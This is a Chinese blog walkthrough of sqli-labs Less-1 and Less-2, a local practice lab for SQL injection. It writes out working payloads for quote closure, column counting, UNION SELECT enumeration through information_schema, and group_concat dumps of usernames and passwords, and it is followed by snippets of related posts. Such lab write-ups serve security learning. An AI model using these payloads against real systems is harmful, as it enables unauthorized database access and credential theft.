字符串转数字 sql_SQL注入·sqli-labs·基于错误的字符串/数字型注入(第1~2关)

最新推荐文章于 2022-07-06 15:10:33 发布
最新推荐文章于 2022-07-06 15:10:33 发布
阅读量117 收藏
点赞数
文章标签: 字符串转数字 sql

cd72b344889993250bbd521deaa6dbaa.png

Less-1

先以get方式输入?id=1 or 1=1 --,结果如下,未报错并且绿字反馈用户名及密码:

http://127.0.0.1/sqli-labs/Less-1/?id=1 or 1=1 --

9cd3a10997f195c572d59bf1a60e1c1a.png

测试闭合符号,常见的闭合符号有'"')"),这一题用到的闭合符号恰巧都能使用

判断列数oeder by (by 3测试字段数为3)

http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+

c6497b261ff36fa08488a3aad6dd1a3c.png

直到值为4的时候反馈库中没有第四列数据:

87d0a08eb6c777b8945c3dab5c5464a4.png

union联合查询 测试联合查询库中有的前三列,格式如下,做间隔符:

http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,3 --+

没有报错证明命令格式无误,但依旧反馈两个大大的绿色 Dumb ,依旧不是我们想要的,问题在于union前面的id,ID值为1的1、2、3列表内没有数据不代表别的ID值内没有,尝试更换ID值继续测试:

http://127.0.0.1/sqli-labs/Less-1/?id= X ' and 1=2 union select 1,2,3 --+

将以上命令中的红色X(ID值)替换得到的不同反馈如下: ID=0时(无信息)↓---------------------------ID=2时(有趣)↓

5fa894b71586b1c64b9eee75adebff19.png

d3f323337dc24e63a21bee5c59605d09.png

前面的步骤自从判断闭合符之后就是一下这个样子

Your Login name:Dumb
Your Password:Dumb

差点让我放弃,我以为我的靶场坏了呢,突然反馈这么多有趣的信息,立刻精神倍儿棒。继续!

?id=0' union select 1,version(),database() --+

57159c6b714617f18730e5b3b9a455b4.png

此处宽字节注入涉及到的函数: addslashes() 函数返回在预定义字符之前添加反斜杠的字符串; database()查询数据库; mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符; mysql_escape_string() — 转义一个字符串; version()Version确认(版本确认);

查看所有数据库名:

?id=1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

f1caef2fa8c5876f447dc362b59a93de.png

查询security内的所有表名:

?id=1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

e54ebf66d4ddbf45b653f49be49a3b7d.png

爆数据表——使用下面的语句爆破出列名:

?id=1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+

7c6cbe3b07e403b0678bd9b6e7d7a890.png

爆用户名和密码——使用下面的语句爆破出用户名及密码:

?id=1' union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+

a7a13bb7676a9d63e963174d8b9a8752.png

Less-2

第一步先判断闭合符,键入?id=1并逐个判断闭合符号 报错:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

不仅是'爆出这样的错误,常见的闭合符'"')")都报出同样的错误。 通过键入

?id=1 and 1=1 --+

反馈亲切的: Your Login name:Dumb Your Password:Dumb 推断出闭合符为整形

16b4c364a9db248760e58ceea852df87.png

同第一题判断数列order by,同第一题一样列数为三列:

68fca6d113f58a52945b30ee2c7b6187.png

查看回显地点

?id=-1 union select 1,2,3–+

利用联合查询来查找想要的数据:

?id=-1 union select 1,database(),version()--+

9adab157dadf4b0c2794c45ba8173129.png

查看后台数据库的语句,可见与预期相符:

1165e38839abc3e097348693293cf9fb.png

爆用户名和密码,与第一题几乎一样,区别在于闭合符号,第二题考察到的是整形闭合符号,第一题的是'

?id=-1 AND 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+

510415fbe7831ccc037324c8fe9ac30d.png

未完待续......

weixin_39765280
关注
SQL注入之字符型、数字型注入原理及注入步骤(sqli-labs-master 1-2)
qiqi_w的博客
11-27 6334
SQL注入之字符型、数字型注入原理及注入步骤 sqli-labs-master 1-2演示截图
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯指南 32、33、34、35、36、37)—宽字节注入
m0_54899775的博客
12-26 1820
sqli-labs Less-32、33、34、35、36、37(sqli-labs闯指南 32、33、34、35、36、37)—宽字节注入
SQL注入·sqli-labs·基于错误字符串/数字型注入(第1~2
King_Ho的博客
07-24 505
Less-1 先以get方式输入?id=1 or 1=1 --,结果如下,未报错并且绿字反馈用户名及密码: http://127.0.0.1/sqli-labs/Less-1/?id=1 or 1=1 -- 测试闭合符号,常见的闭合符号有'、"、')、"),这一题用到的闭合符号恰巧都能使用 判断列数oeder by (by 3测试字段数为3) http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+ 直到值为4的时候反馈库中没有第四列数据: un
06、注入篇--显错注入数字型
WX公众号-小白学安全
04-05 533
文章目录概述利用防范靶场 概述 利用 防范 靶场
sql注入常用语句
weixin_30537451的博客
03-07 971
SQL注入 1. 什么是sql注入 通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 2. sql注入类型 按照注入点类型来分类 (1)数字型注入点 许多网页链接有类似的结构http://xxx.com/users.php?id=1基于此种形式的注入,一般被叫做数字型注入点,缘由是其注入点 id 类型为数字,在大多数...
sql注入靶场练习
weixin_46976845的博客
03-19 5914
pass.1 发现id注入点,尝试联合注入 id=1’ union select 1,database().3 --+或者 id=1’ union select 1,database().3#’ 返回 Welcome Dhakkan Your Login name:Dumb Your Password:Dumbsqlmap 得知数据库账户密码都为root pass.2 注入与1相同 pass.3 括号闭合 注意 ?id=1’) union select 1,database().3 --+ pa
sqli-labs less1
sopora的博客
10-09 334
先来了解一下MYSQL注入的基本姿势 url编码: url中只能含有英文字母、阿拉伯数字和某些标点符号,不能使用其他文字和符号,所以要对其编码 sql注入中常用的url编码有:空格%20,单引号%27,双引号%22,井号%23 mysql中常用的系统表与函数: 系统数据库information_schema存储数据库元数据,其中的tables存储了表的元数据,常用字段:table_sche...
sqli-labs第一的闯
qq_45154529的博客
01-05 2127
第一:单引号错误 SQL注入最终是为了拿到数据库的文件或者数据。 刚进页面,显示需要输入id。 于是我们使用在地址栏后面加上 ?id=1 第二行的黄色字体是我自己添加的内容,表示被传入mysql执行的语句(方便我加深理解),绿色字体是正常显示的内容。 如果你也想要显示此语句,可以在安装目录下的此页面的php当中,加入这条语句 echo “$sql” 判断有无注入点: 老规矩:加上and 1=1;and 1=2,看一下回显有没有不同。没有!说明其在sql中不是单纯应用数值作为参数。
sqli-labs学习笔记(十一)less 32-37 宽字节注入
闵行小鱼塘
09-18 707
继续学习sqli-labs,本篇是less 32-37
sqli-labs 1-10通教程
m0_51428325的博客
12-26 702
1.LOW <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query
程序“npm.cmd”无法运行: 拒绝访问。
ZhengYanFeng1989的博客
10-24 4283
程序“npm.cmd”无法运行: 拒绝访问。 程序“npm.cmd”无法运行: 拒绝访问。所在位置 行:1 字符: 1 + npm install + ~~~~~~~~~~~。 所在位置 行:1 字符: 1 + npm install + ~~~~~~~~~~~ + CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException 我的出现这个原因是360的问题,可能阻止了访问,闭360之后,npm即可正常使...
sqlilabs_4
ZERO_zero_0的博客
07-06 209
sqlilabs_4
Sqli注入
GuaJi_Akai的博客
11-28 210
Less-1 题目:GET-Error based-single quotes-String 1.第一步:输入?id=0‘ ‘‘0’’ LIMIT 0,1’ at line 1 去掉前后两个’ 判断为字符型 2.第二步: 1)order by 数字-+ 判断有多少列(二分法) 3.第三步: 联合查询 在2,3 在这两个位置插入语句进行爆破 4.第四步:爆破 Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admi
Sqli-labs~Less-1~Less-4
n0d_xy的博客
04-14 387
简介:文章分为三部分:1、概要;2、详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 前面的话:操作学习的环境----Linux环境...
nexus.bat : 无法将“nexus.bat”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。请检查名称的拼写,如果包括路径,请 保路径正确,然后再试一次。 所在位置 行:1 字符:
qq_27088383的博客
01-28 4476
PS D:\j2ee\nexus\nexus-2.12.0-01\bin&gt; nexus.bat nexus.bat : 无法将“nexus.bat”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。请检查名称的拼写,如果包括路径,请确 保路径正确,然后再试一次。 所在位置 行:1 字符: 1 + nexus.bat + ~~~~~~~~~ + CategoryInf...
win10系统安装和优化
qq_42201356的博客
03-17 5663
电脑检测软件
MySQL注入涉及的information_schema库讲解
雷根瓦尔德
11-19 3039
当我们在进行MySQL手工注入的时候,经常要涉及到一个库“infromation_schema”,可能有些朋友在用的时候,对这个库的操作或多或少有些理解,但是细想又不知道怎么说。大概就是知道这样做也挺明白,就是讲不出为啥????。 这篇文章不是讲MySQL注入实战,旨在讲述我们在注入时使用information_schema库主要涉及的一些表,使同为新手的朋友能了解这些语句的用意和意义。我近期挖出并提交...
sqli-labs初学习
Wei_xino的博客
04-19 475
sqli-labs 碎碎念:我记得我之前是写了一章博客的,原来的几个考核wp和前两个less,为什么不见了,算了,那就从头开始吧。初学者,只能看自己的理解走头开始走了。 less-1 最初学,我们先要弄懂,为什么会有注入的存在。 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 这句话是从Less-1 index.php里面截下来的上传语句。...
SQL注入中group_concat的学习笔记
kofi的博客,已停更
04-07 1395
<link rel="stylesheet" href="https://csdnimg.cn/release/blogv2/dist/mdeditor/css/editerView/ck_htmledit_views-b5506197d8.css"> <div id="content_views" class="markdown_views prism-atom-one-dark"> <svg xmlns="ht...
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值